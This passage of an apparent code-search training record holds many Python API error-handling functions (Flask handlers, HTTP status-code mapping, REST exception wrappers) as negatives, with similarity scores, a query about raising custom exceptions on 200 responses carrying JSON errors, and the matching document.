{error[\"message\"]}')\n if code == 429:\n self.__log(f'Monthly request limits exceeded. Upgrade billing or change token.', 'error')\n raise MonthlyRequestLimitExceededError\n self.__log(f'Response for code: \"{code}\" was unhandled by wrapper. Sorry to not be more helpful.', 'error')\n raise UnknownApiError(\"An unhandled API exception occurred\")", "def handle_error(self, error):\n html = error.response.content\n raise SystemExit(\"API Error:\\n %s\" %\n \"\\n \".join(html.itertext()))", "def get_error_message_from_razorpay_error(exc: BaseException):\n logger.exception(exc)\n if isinstance(exc, razorpay.errors.BadRequestError):\n return errors.INVALID_REQUEST\n else:\n return errors.SERVER_ERROR", "def check_error(self, response):\n if type(response) is dict and response.has_key('status_code'):\n if response['status_code'] != 200:\n raise rocket.RocketAPIException(response['status_code'],\n response['status_text'])", "def _msg(response):\n try:\n return response.json().get('message')\n except simplejson.scanner.JSONDecodeError:\n return response.text\n except Exception: # pylint: disable=W0703\n return 'Unexpected error.'", "def get_error(self):\n\t\treturn handle_to_object(call_sdk_function('PrlJob_GetError', self.handle))", "def error_handler(response, **kwargs):\n if 400 <= response.status_code <= 499:\n message = response.json()['error_description'] \\\n if 'error_description' in response.json() \\\n else response.json()['error_detail']\n raise ClientError(response, message)\n\n elif 500 <= response.status_code <= 599:\n raise ServerError(response)\n\n return response", "def get_error(self):\n p = self._get_sub_text('error')\n if not p:\n return None\n else:\n try:\n return float(p)\n except ValueError:\n return None", "def print_errors(res, ctx):\n\n if _has_error_code(res):\n return res.get('msg', '')\n return None", "def on_response_validation_error(err):\n return jsonify(message='Bad response'), 500", "def getError(self, status):\r\n nBuffer = 512\r\n msgBuffer = ctypes.create_string_buffer(nBuffer)\r\n # ViStatus status = Acqrs_errorMessage(ViSession instrumentID,\r\n # ViStatus errorCode, ViChar errorMessage[],ViInt32 errorMessageSize);\r\n AgDLL['Acqrs_errorMessage'](self.session, status, msgBuffer,\r\n ViInt32(nBuffer))\r\n return msgBuffer.value", "def _process_error(self, result):\n self.error = result\n if result['errorCode'] == 901:\n raise Exceptions.APIKeyInvalid\n elif result['errorCode'] == 902:\n raise Exceptions.APISecretInvalid\n elif result['errorCode'] == 903:\n raise Exceptions.InvalidRequestToken\n elif result['errorCode'] == 904:\n raise Exceptions.RequestTokenExpired\n elif result['errorCode'] == 905:\n raise Exceptions.InvalidAccessToken\n elif result['errorCode'] == 906:\n raise Exceptions.TokenExpired(self.access.expire)\n elif result['errorCode'] == 907:\n raise Exceptions.ParameterMissing\n elif result['errorCode'] == 908:\n raise Exceptions.ParameterNotFormatted\n elif result['errorCode'] == 909:\n raise Exceptions.FeatureNotSupported\n elif result['errorCode'] == 910:\n raise Exceptions.EndPointNotSupported\n else:\n raise Exceptions.UnknownJsonError(result)", "def _find_errors_in_page(self, response):\n if response.status_code == 403:\n return \"Could not check for errors, as response was a 403 response\\\n forbidden. User asking for this url did not have permission.\"\n \n \n errors = re.search('<ul class=\"errorlist\">(.*)</ul>', \n response.content, \n re.IGNORECASE)\n\n if errors: \n #show a little around the actual error to scan for variables that\n # might have caused it\n span = errors.span()\n wide_start = max(span[0]-200,0)\n wide_end = min(span[1]+200,len(response.content)) \n wide_error = response.content[wide_start:wide_end]\n return wide_error\n \n return \"\"", "def _process_error_response(self, toc, buf):\n\n\t\terrorSev = None\n\t\terrorMsg = None\n\t\terrorDet = None\n\n\t\tif toc != 'E' and toc != 'N':\n\t\t\treturn\n\n\t\tparts = buf.split(b'\\0')\n\n\t\tfor part in parts:\n\t\t\tpart = part.decode()\n\t\t\tif len(part) < 1:\n\t\t\t\tcontinue\n\t\t\t_type = part[0]\n\t\t\tif _type == 'M':\n\t\t\t\terrorMsg = part[1:]\n\t\t\telif _type == 'S':\n\t\t\t\terrorSev = part[1:]\n\t\t\telif _type == 'D':\n\t\t\t\terrorDet = part[1:]\n\t\t\n\t\tif not errorSev and not errorMsg:\n\t\t\treturn\n\n\t\tif toc != 'E':\t\t\t\t# This is not an error report it as debug\n\t\t\tif self.Pfdebug:\n\t\t\t\tself.Pfdebug.write(f'BACKEND {errorSev}: {errorMsg}\\n')\n\t\t\t\tif errorDet:\n\t\t\t\t\tself.Pfdebug.write(f'DETAIL: {errorDet}\\n')\n\t\telse:\n\t\t\tif errorDet:\n\t\t\t\tself.pcp_internal_error(f'{errorSev}: {errorMsg}\\nDETAIL: {errorDet}\\n')\n\t\t\telse:\n\t\t\t\tself.pcp_internal_error(f'{errorSev}: {errorMsg}\\n')\n\t\t\tself._setResultStatus(ResultStateType.BACKEND_ERROR)", "def getErrorMessage(self):\n return self._errorMessage", "def error_details(self) -> pulumi.Output[Sequence['outputs.ErrorDetailResponse']]:\n return pulumi.get(self, \"error_details\")", "def from_tornado_error(cls, http_request, http_error):\n response = http_error.response\n return HTTPError(http_request, http_error.code, response=response,\n reason=None if response is None else response.reason)", "def err(self):\n return self._err.getvalue()", "def error_body(self):\n return self._status.error_body", "def get_error_message(self):\n try:\n return api.Api.get_error_message(self._session)\n except exceptions.UnknownException:\n return \"<error message irrecoverable>\"", "def error(self):\n if self.p_err.poll():\n return self.p_err.recv()", "async def _handle_response(response: ClientResponse) -> Dict:\n content = await response.json(encoding='utf-8', loads=loads)\n if response.status != 200:\n for member in JmRpcErrorType:\n if content['message'] != member.value:\n continue\n raise JmRpcError(response.status, content)\n response.raise_for_status()\n return content", "def get_error(self, idx=0):\n return self.portal.error_log.getLogEntries()[idx]", "def raise_for_status(response):\n http_error_msg = \"\"\n\n if 400 <= response.status_code < 500:\n http_error_msg = \"{} Client Error: {}\".format(\n response.status_code, response.reason\n )\n\n elif 500 <= response.status_code < 600:\n http_error_msg = \"{} Server Error: {}\".format(\n response.status_code, response.reason\n )\n\n if http_error_msg:\n try:\n more_info = response.json().get(\"message\")\n except ValueError:\n more_info = None\n if more_info and more_info.lower() != response.reason.lower():\n http_error_msg += \".\\n\\t{}\".format(more_info)\n raise requests.exceptions.HTTPError(http_error_msg, response=response)", "def _get_result_or_raise_error(reply):\n if 'error' in reply:\n e = reply['error']\n raise JadeError(e.get('code'), e.get('message'), e.get('data'))\n\n return reply['result']", "def failure(self, error):\n \n self.request.response.status_int = 400\n return None", "def handle_error(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def handle_api_error(e):\n return f\"Failed to call Giphy API: {e}\", 500", "def process_error_response(self, resources, resource, api, operation,\n error_response, context):\n pass", "def server_error(err):\n log.error(err)\n return err.msg, 500", "def _handle_api_error(ex):\n if request.path.startswith('/api/'):\n message, detail = str(ex).split(\": \")\n return jsonify(message=message, detail=detail), ex.code\n else:\n return ex", "def http_exception(error):\n data = {'error': str(error)}\n return app.response_class(\n response=json.dumps(data),\n status=error.code,\n mimetype='application/json'\n )", "def _error_check(self, command_response):\n error_list = command_response.find(\"./clierror\")\n command_obj = command_response.find(\"./input\")\n if error_list is not None:\n command = command_obj.text if command_obj is not None else \"Unknown command\"\n msg = etree.tostring(error_list).decode()\n raise NXAPICommandError(command, msg)", "def _extract_openssl_error():\n\n error_num = libcrypto.ERR_get_error()\n buffer = buffer_from_bytes(120)\n libcrypto.ERR_error_string(error_num, buffer)\n\n # Since we are dealing with a string, it is NULL terminated\n error_string = byte_string_from_buffer(buffer)\n\n return _try_decode(error_string)", "def assert_has_valid_error(self, response, expected_code):\r\n assert 'error' in response\r\n assert len(response) == 1\r\n \r\n error = response['error']\r\n assert 'code' in error\r\n assert error['code'] == expected_code\r\n assert 'title' in error\r\n assert isinstance(error['title'], str)\r\n assert 'message' in error\r\n assert isinstance(error['message'], str)", "def parse(response):\n if isinstance(response, dict):\n json = response\n else:\n json = response.json()\n\n if json.get('Error'):\n raise Exception('Error in retrieval: ' + self.json['error'])\n\n return json", "def error():\n return None", "def handle_invalid_usage(error):\n\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def print_requests_httperror(cls, class_name, response):\n print(\n f\"{cls.ERROR_PREFIX} {cls.REQUESTS_PACKAGE_HTTPERROR_MESSAGE} {class_name}/{response.json()['message']}\"\n )", "def _check_status_error(self, res: requests.Response) -> None:\n try:\n if self._raise_exceptions:\n res.raise_for_status()\n if res.status_code > 600:\n raise requests.exceptions.HTTPError(\n u'%s Illegal return code: %s for url: %s' % (res.status_code, res.reason, res.url),\n response=res)\n\n except requests.exceptions.HTTPError as err:\n http_error_msg = str(err.args[0])\n\n if res.content:\n try:\n json_result: dict = res.json()\n message = json_result['error']['message']\n http_error_msg += \": \" + message\n except (json.JSONDecodeError, KeyError):\n if '_TOKEN' not in res.text:\n http_error_msg += \": \" + str(res.text)\n\n raise requests.exceptions.HTTPError(http_error_msg, response=err.response) from err", "def test_parse_error_response(self):\n self.assertEqual(\n parse_server_answer(ERROR_SERVER_RESPONSE),\n f'Bad response. {ERROR_SERVER_RESPONSE[RESPONSE]}: {ERROR_SERVER_RESPONSE[ERROR]}'\n )", "def raise_for_status(response):\n if response.status_code != 200:\n res_data = response.json()\n if (response.status_code, res_data['error']) in error_map:\n raise error_map[(response.status_code, res_data['error'])](res_data['error_description'])\n raise ShoperApiError(res_data['error_description'])\n\n return response", "def handle_exception(error):\n return make_response(jsonify({'message': error.description}), 400)", "def response_from_error(error_code, error_message=None):\n\terror = Error(error_code, error_message).__dict__\n\terror_response_code = error['response_code']\n\treturn Response(json.dumps(error), status=error_response_code, mimetype='application/json')", "def errmsg(r):\n return \"%s %s\\n\\n%s\" % (r.status, r.reason, r.raw)", "def from_http_error(cls, e):\n assert isinstance(e, requests.HTTPError), \"Expected 'requests.HTTPError' object\"\n r = e.response\n if r.status_code == 400:\n raise BadRequest(format_exception(e))\n elif r.status_code == 401:\n raise Unauthorized(format_exception(e))\n elif r.status_code == 403:\n raise Forbidden(format_exception(e))\n elif r.status_code == 404:\n raise NotFound(format_exception(e))\n elif r.status_code == 405:\n raise NoMethod(format_exception(e))\n elif r.status_code == 409:\n raise Conflict(format_exception(e))\n elif r.status_code == 411:\n raise LengthRequired(format_exception(e))\n elif r.status_code == 412:\n raise PreconditionFailed(format_exception(e))\n elif r.status_code == 416:\n raise BadRange(format_exception(e))\n elif r.status_code == 500:\n raise InternalServerError(format_exception(e))\n elif r.status_code == 501:\n raise NotImplemented(format_exception(e))\n elif r.status_code == 502:\n raise BadGateway(format_exception(e))\n else:\n logger.error(\n 'Unhandled HTTPError status code {sc} -- {msg}.'.format(sc=r.status_code, msg=format_exception(e)))\n raise InternalServerError(format_exception(e))" ]
[ "0.83358467", "0.78637624", "0.7812136", "0.7469619", "0.74155784", "0.7169605", "0.7166862", "0.7096074", "0.7082572", "0.704426", "0.7022822", "0.69620997", "0.6958218", "0.6933554", "0.6891388", "0.68128866", "0.67896175", "0.67648655", "0.6737759", "0.66620314", "0.6644747", "0.6602933", "0.6565051", "0.6561322", "0.65567136", "0.65312696", "0.652323", "0.6517374", "0.65154064", "0.65154064", "0.65154064", "0.6511031", "0.65085125", "0.65078557", "0.642306", "0.6397883", "0.6384559", "0.6376041", "0.6375979", "0.6374747", "0.6366101", "0.6341838", "0.63188225", "0.63166445", "0.6314802", "0.6305269", "0.6286332", "0.62796545", "0.6276691", "0.6273366", "0.62642217", "0.62532246", "0.6248684", "0.6247443", "0.62471604", "0.62381613", "0.62348413", "0.6225425", "0.6208955", "0.62055606", "0.61830205", "0.61707896", "0.6144279", "0.6141219", "0.61365306", "0.61361533", "0.6130442", "0.61265075", "0.6122625", "0.61191934", "0.6118967", "0.6116601", "0.6112908", "0.610606", "0.61053723", "0.61021423", "0.60974467", "0.60862195", "0.6076746", "0.60765535", "0.6072424", "0.6071711", "0.6070438", "0.6069037", "0.6068615", "0.60603976", "0.6059087", "0.60518205", "0.60474616", "0.6046218", "0.6045707", "0.6045707", "0.60435414", "0.6029339", "0.6026453", "0.60255975", "0.6017013", "0.6016416", "0.6008656", "0.60062015" ]
0.6469981
34
Wrapper for throwing custom exceptions. When, for example, the server responds with 200, and errors are passed inside json.
def error_handling( self, tapi_exception, error_message, repeat_number, response, request_kwargs, api_params, **kwargs ): raise tapi_exception
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_json_error(ex):\n if isinstance(ex, HTTPException):\n return ex;\n elif isinstance(ex, ResourceException):\n info = ex.to_dict()\n status_code = ex.http_status\n info[\"type\"] = \"exception\"\n else:\n message = \"There was an internal server error. Please try again later.\"\n info = {\"code\": \"internal_server_error\", \"message\": message, \"type\": \"exception\"}\n status_code = 500\n # generally we should log these 500 errors with the stacktrace somewhere -- we used splunk at Box.\n\n response = jsonify(**info)\n response.status_code = status_code\n return response", "def http_exception(error):\n data = {'error': str(error)}\n return app.response_class(\n response=json.dumps(data),\n status=error.code,\n mimetype='application/json'\n )", "def handle_exception(error):\n return make_response(jsonify({'message': error.description}), 400)", "def _raise_http_error(self, *args, **kwargs):", "def exception_handler(exc):\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n\n return Response({'error_code': CustomSerializer.get_api_code(exc.detail),\n 'error_message': exc.detail,\n 'errors': []},\n status=exc.status_code,\n headers=headers)\n\n elif isinstance(exc, Http404):\n return Response({'error_code': CustomSerializer.get_api_code('Not found'),\n 'error_message': 'Not found',\n 'errors': []},\n status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n return Response({'error_code': CustomSerializer.get_api_code('You do not have permission to perform this action.'),\n 'error_message': 'You do not have permission to perform this action.',\n 'errors': []},\n status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def handle_error(self, err): # pragma: no cover\n # log every exception raised in the application\n print('we ended up in the API handle_error()', err, err.__class__)\n\n # catch other HTTP errors\n if isinstance(err, HTTPException):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'success': False,\n 'error': err.code,\n \"message\": getattr(err.error, 'message')\n }), err.code\n\n # if 'message' attribute isn't set, assume it's a core Python exception\n if not getattr(err, 'message', None):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'message': 'Server has encountered an unknown error'\n }), 500\n\n # Handle application-specific custom exceptions\n return jsonify(**err.kwargs), err.http_status_code", "def error(\n status=500,\n message=\"Internal Server Error\"\n):\n return make_response(\n jsonify(error=message),\n status,\n )", "def catch_exception(func):\n def wrapper(*args, **kwargs):\n try:\n ret_val = func(*args, **kwargs)\n return ret_val\n except Exception as err:\n logger.exception(\"func name: %s, error: %s\" % (func.__name__, err))\n result = {\"code\": -20001, \"msg\": str(err)}\n return JsonResponse(result)\n return wrapper", "def error_handler(response, **kwargs):\n if 400 <= response.status_code <= 499:\n message = response.json()['error_description'] \\\n if 'error_description' in response.json() \\\n else response.json()['error_detail']\n raise ClientError(response, message)\n\n elif 500 <= response.status_code <= 599:\n raise ServerError(response)\n\n return response", "def jsonify_exception(error: HTTPException) -> Response:\n exc_resp = error.get_response()\n response: Response = jsonify(reason=error.description)\n response.status_code = exc_resp.status_code\n return response", "def helper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except (requests.exceptions.RequestException,\n json.JSONDecodeError,\n simplejson.scanner.JSONDecodeError) as err:\n return handle_specific_exception(err)\n except TypeError as err:\n success = False\n return RestReturn(success=success, message=err.args[0])", "def raise_on_error(request: requests.Response) -> None:\n if request.status_code >= 400:\n json_res = request.json()\n raise requests.HTTPError(json_res)\n\n return None", "def handle_uncaught_error(e):\n status_code = 500\n\n result = {\n \"error_message\": \"Unknown or unexpected error.\",\n \"error_code\": \"INTERNAL_SERVER_ERROR\"\n }\n return jsonify(result), status_code", "def handle_api_exception(error):\n response = flask.jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def generic_exception_handler( exc, context ):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler( exc, context )\n\n if isinstance( exc, Http_error ):\n response = Response( exc.context, status=exc.status_code )\n set_rollback()\n\n return response", "def _writeJSONErrorResponse(f, request):\n code = getattr(f.value, 'code', CODE.UNKNOWN)\n _writeJSONResponse(\n result=f.getErrorMessage().decode('ascii'),\n request=request,\n code=code,\n status=_mapErrorCodeToStatus(code))\n raise f", "def exception_handler(res):\n try:\n res_data = res.json()\n error_code = res_data['status']\n error_msg = build_error_msg(res_data['errors'])\n exception = DemistoException(ERROR_TITLES.get(error_code, '') + error_msg)\n\n except Exception:\n exception = DemistoException(f'Error in API call [{res.status_code}] - {res.reason}')\n\n raise exception", "def from_http_error(cls, e):\n assert isinstance(e, requests.HTTPError), \"Expected 'requests.HTTPError' object\"\n r = e.response\n if r.status_code == 400:\n raise BadRequest(format_exception(e))\n elif r.status_code == 401:\n raise Unauthorized(format_exception(e))\n elif r.status_code == 403:\n raise Forbidden(format_exception(e))\n elif r.status_code == 404:\n raise NotFound(format_exception(e))\n elif r.status_code == 405:\n raise NoMethod(format_exception(e))\n elif r.status_code == 409:\n raise Conflict(format_exception(e))\n elif r.status_code == 411:\n raise LengthRequired(format_exception(e))\n elif r.status_code == 412:\n raise PreconditionFailed(format_exception(e))\n elif r.status_code == 416:\n raise BadRange(format_exception(e))\n elif r.status_code == 500:\n raise InternalServerError(format_exception(e))\n elif r.status_code == 501:\n raise NotImplemented(format_exception(e))\n elif r.status_code == 502:\n raise BadGateway(format_exception(e))\n else:\n logger.error(\n 'Unhandled HTTPError status code {sc} -- {msg}.'.format(sc=r.status_code, msg=format_exception(e)))\n raise InternalServerError(format_exception(e))", "def handle_unknown_errors(exc):\n return jsonify(dict(\n traceback=traceback.format_exc(),\n message=str(exc),\n )), 500", "def generic_errors(error, code):\n errors = {}\n errors[\"error\"] = error\n response = jsonify(errors)\n response.status_code = code\n return response", "def process_exception(self, request, exception):\n logging.error(\"ERROR\")\n logging.error(traceback.format_exc())\n response = set_response(\"Internal server error\", False, 500, {})\n return JsonResponse(response, status=response[\"http_code\"])", "def _catch_error(f):\n @wraps(f) \n def wrap(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception as e:\n raise HTTPBadRequest(reason=e)\n return wrap", "def response_error(error, status=400):\n\n response = {\n 'status': 'failed',\n 'error': error\n }\n\n return response_json(response, status=400)", "def handle_errors(func):\n def wrapper(*args, **kwargs):\n try:\n response = func(*args, **kwargs)\n except Exception as e:\n response = jsonify({\"success\": False, \"message\": str(e)})\n return response\n wrapper.func_name = func.func_name\n return wrapper", "def raise_for_status(response):\n if response.status_code != 200:\n res_data = response.json()\n if (response.status_code, res_data['error']) in error_map:\n raise error_map[(response.status_code, res_data['error'])](res_data['error_description'])\n raise ShoperApiError(res_data['error_description'])\n\n return response", "def _catch_error(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except Exception as e:\n raise HTTPBadRequest(reason=e)\n return wrap", "def throw_error(self, error, status_code=400, **extra):\n data = dict(success=False, data=dict(message=error, **extra))\n raise ShortCircuitHttpChain(response=JsonResponse(data, status=status_code))", "def raise_best_exception(self, json_response):\n exceptions = {\n 206: CannotParseError,\n 400: BadRequestError,\n 401: NotAuthorizedError,\n 403: ForbiddenError,\n 404: NotFoundError,\n 500: ServerError,\n 503: UnavailableError,\n }\n try:\n err = json_response['response']['error']\n raise exceptions[err['code']](err['code'],err['message'])\n except IndexError:\n raise UnexpectedError('','Unexpected error.')", "def jsonify(func):\n\n @functools.wraps(func)\n def convert(*args, **kwargs):\n\n success = True\n code = 200 # default status code - success!\n\n try:\n result = func(*args, **kwargs)\n\n if isinstance(result, BaseResponse):\n return result\n\n except exc.HTTPException as ex:\n # i'd like to be able to just re-raise e here, but the body of the\n # response is e.get_body() instead of e.description - so we have to\n # just set up the response ourselves\n result = { 'message' : ex.description }\n code = ex.code\n\n except Exception as ex:\n result = { 'message' : 'Internal Server Error', 'system_message' : ex.message }\n code = 500\n\n # build a response object, and change the content type header to json\n response = make_response(json.dumps(result))\n response.headers['Content-Type'] = 'application/json'\n response.status_code = code\n\n return response\n\n # return the function that is taking the place of (or masquerading as) our decorated function\n return convert", "def bad_request(self, error):\n return jsonify({'error': 'BAD REQUEST'}), 400", "def httperror( status_code=500, message=b'' ):", "def json_error(message):\n return json_response(isError=True, message=message)", "def exceptions(e):\n # NOTE: add log entry\n str(getattr(e, \"code\", \"unavailable\"))\n log_error_code = str(getattr(e, \"code\", \"unavailable\"))\n service_log.error(\n f\"{request.remote_addr} {request.method} {request.scheme} {request.full_path}\\n\"\n f\"Error code: {log_error_code}\\n\"\n f\"Stack trace: {traceback.format_exc()}\"\n )\n\n # NOTE: craft user messages\n if hasattr(e, \"code\"):\n code = int(e.code)\n\n # NOTE: return an http error for methods with no body allowed. This prevents undesired exceptions.\n NO_PAYLOAD_METHODS = \"HEAD\"\n if request.method in NO_PAYLOAD_METHODS:\n return Response(status=code)\n\n error: ServiceError\n if code == 400:\n error = ProgramHttpRequestError(e)\n elif code == 404:\n error = ProgramHttpMissingError(e)\n elif code == 405:\n error = ProgramHttpMethodError(e)\n elif code == 408:\n error = ProgramHttpTimeoutError(e)\n else:\n error = ProgramHttpServerError(e, code)\n\n return error_response(error)\n\n # NOTE: Werkzeug exceptions should be covered above, the following line is for\n # unexpected HTTP server errors.\n return error_response(e)", "def return_json_error(msg, status_code):\n return Response(response=json.dumps({'message': str(msg)}), status=status_code, mimetype=\"application/json\")", "def error_return(content, status):\n content = '{' + '\"status\":{},\"message\":\"{}\"'.format(status, content) + '}'\n return Response(content, status=status, mimetype='application/json')", "def response_json_error_info(func):\n\n def wrapper(req):\n try:\n return func(req)\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def response_json_error_info(func):\n def wrapper(request):\n try:\n return func(request)\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def common_exceptions_400(func):\r\n def wrapped(request, *args, **kwargs): # pylint: disable=C0111\r\n use_json = (request.is_ajax() or\r\n request.META.get(\"HTTP_ACCEPT\", \"\").startswith(\"application/json\"))\r\n try:\r\n return func(request, *args, **kwargs)\r\n except User.DoesNotExist:\r\n message = _(\"User does not exist.\")\r\n if use_json:\r\n return JsonResponse({\"error\": message}, 400)\r\n else:\r\n return HttpResponseBadRequest(message)\r\n except AlreadyRunningError:\r\n message = _(\"Task is already running.\")\r\n if use_json:\r\n return JsonResponse({\"error\": message}, 400)\r\n else:\r\n return HttpResponseBadRequest(message)\r\n return wrapped", "def _handle_api_error(ex):\n if request.path.startswith('/api/'):\n message, detail = str(ex).split(\": \")\n return jsonify(message=message, detail=detail), ex.code\n else:\n return ex", "def application_error(e):\n message = {\n 'status': 500,\n 'message': 'Sorry, unexpected error: ' + format(e)\n }\n resp = jsonify(message)\n resp.status_code = 500\n\n return resp", "def on_response_validation_error(err):\n return jsonify(message='Bad response'), 500", "def custom_exception_handler(exc, context):\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n # Use the manually set message if it exists.\n if hasattr(exc, \"message\"):\n message = exc.message or ''\n # Otherwise construct the message from the details.\n else:\n message = ''\n for key in exc.detail:\n try:\n if isinstance(exc.detail[key], str):\n message += exc.detail[key] + ' '\n else:\n for error in exc.detail[key]:\n # Exclude duplicates.\n if error not in message:\n message += error + ' '\n except TypeError:\n if key == 'non_field_errors':\n message = exc.detail[key][0]\n else:\n message = _('Invalid request.')\n\n # Remove trailing whitespace.\n if message.endswith(' '):\n message = message[:-1]\n\n data = OrderedDict([\n ('status', 'error'), ('message', message), ('data', exc.detail)\n ])\n else:\n data = OrderedDict([('status', 'error'), ('message', exc.detail)])\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n elif isinstance(exc, Http404):\n msg = _('Not found.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n msg = _('Permission denied.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_403_FORBIDDEN)\n\n elif isinstance(exc, DjangoBaseException):\n data = {'status': 'error', 'message': exc.default_detail}\n\n set_rollback()\n return Response(data, status=exc.status_code)\n\n # If debug is false return a formatted error and raise an internal error.\n if not settings.DEBUG:\n logger.exception(exc)\n exc = DjangoBaseException()\n return Response(\n {'status': 'error', 'message': exc.default_detail},\n status=exc.status_code\n )\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n\n return Response(\n str(exc),\n status=response.status_code if response is not None else HTTP_500_INTERNAL_SERVER_ERROR,\n )", "def make_error(status_code, message, sub_code=None, action=None, **kwargs):\n data = {\n 'status': status_code,\n 'message': message,\n }\n if action:\n data['action'] = action\n if sub_code:\n data['sub_code'] = sub_code\n data.update(kwargs)\n response = jsonify(data)\n response.status_code = status_code\n return response", "def known_exceptions(func):\n def helper(*args, **kwargs):\n \"\"\"Actual Decorator for handling known exceptions\"\"\"\n try:\n return func(*args, **kwargs)\n except (requests.exceptions.RequestException,\n json.JSONDecodeError,\n simplejson.scanner.JSONDecodeError) as err:\n return handle_specific_exception(err)\n except TypeError as err:\n success = False\n return RestReturn(success=success, message=err.args[0])\n return helper", "def exception_handler(exc, context):\n if isinstance(exc, NotFoundException):\n exc = exceptions.NotFound()\n elif isinstance(exc, UnauthorizedException):\n exc = exceptions.PermissionDenied()\n elif isinstance(exc, exceptions.NotAuthenticated):\n exc = NotAuthenticated()\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n data = exc.detail\n else:\n data = {'detail': exc.detail}\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n return None", "def return_error(self, status, payload=None):\n resp = None\n if payload is not None:\n payload = json.dumps(payload)\n resp = self.make_response(payload, status=status)\n\n if status in [405]:\n abort(status)\n else:\n abort(status, response=resp)", "def _rest_error(self, status_code, error_code, message):\n return {\"status_code\": status_code, \"error_code\": error_code, \"message\": message}", "def exception_handler(exc, context):\n headers = None\n if isinstance(exc, APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n data = exc.detail\n if type(data) is ErrorDetail:\n data = str(data)\n status_code = exc.status_code\n set_rollback()\n\n elif isinstance(exc, Http404):\n data = \"Not Found\"\n status_code = status.HTTP_404_NOT_FOUND\n set_rollback()\n\n else:\n data = str(exc)\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n\n return smart_response(data, status_code=status_code, headers=headers)", "def jsonify_http_exception(exception: HTTPException):\n return jsonify(exception.description, exception.code)", "def returns_json(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n r = f(*args, **kwargs)\n except HTTPException as e:\n # monkey-patch the headers / body to be json\n headers = e.get_headers()\n for header in headers:\n if 'Content-Type' in header:\n headers.remove(header)\n headers.append(('Content-Type', 'application/json'))\n e.get_headers = lambda x: headers\n e.get_body = lambda x: json.dumps({\"message\": e.description})\n raise e\n if isinstance(r, tuple):\n return Response(r[0], status=r[1], content_type='application/json')\n else:\n return Response(r, content_type='application/json')\n return decorated_function", "def handling_unknown_err(e):\n app.logger.exception(e)\n return resp_json(BaseResp.err(e.name))", "def jsonable_error(status=500, message=\"The Studio servers encountered an error\"):\r\n def outer(func):\r\n @functools.wraps(func)\r\n def inner(request, *args, **kwargs):\r\n if request.is_ajax():\r\n content = json.dumps({\"error\": message})\r\n return HttpResponse(content, content_type=\"application/json\",\r\n status=status)\r\n else:\r\n return func(request, *args, **kwargs)\r\n return inner\r\n return outer", "def handle_exception(e):\n # start with the correct headers and status code from the error\n response = e.get_response()\n # replace the body with JSON\n response.data = json.dumps({\n \"code\": e.code,\n \"name\": e.name,\n \"description\": e.description,\n })\n response.content_type = \"application/json\"\n return response", "def handle_exception(e):\r\n # start with the correct headers and status code from the error\r\n response = e.get_response()\r\n # replace the body with JSON\r\n response.data = json.dumps({\r\n \"code\": e.code,\r\n \"name\": e.name,\r\n \"description\": e.description,\r\n })\r\n response.content_type = \"application/json\"\r\n return response", "def json_err(msg: str) -> Response:\n return jsonify({\"success\": False, \"error\": msg})", "def handle_exception(e):\r\n # start with the correct headers and status code from the error\r\n response = e.get_response()\r\n # replace the body with JSON\r\n response.data = json.dumps({\r\n \"code\": e.code,\r\n \"name\": e.name,\r\n \"description\": e.description,\r\n })\r\n response.content_type = \"application/json\"\r\n return response", "async def creation_error_handler(_: Request, exc: MyCustomException,) -> JSONResponse:\n return JSONResponse(\n content={\"errors\": f\"{exc.name}\"},\n status_code=CustomExceptionCodes.HTTP_419_CREATION_FAILED.value,\n )", "def catch_error(\n exception=None, catch_generic=True,\n exception_label=None,\n # TO FIX: where have this gone??\n # error_code=None,\n **kwargs):\n\n if exception_label is None:\n exception_label = ''\n if len(exception_label) > 0:\n exception_label += ': '\n if exception is None:\n exception = RestApiException\n\n def decorator(func):\n @wraps(func)\n def wrapper(self, 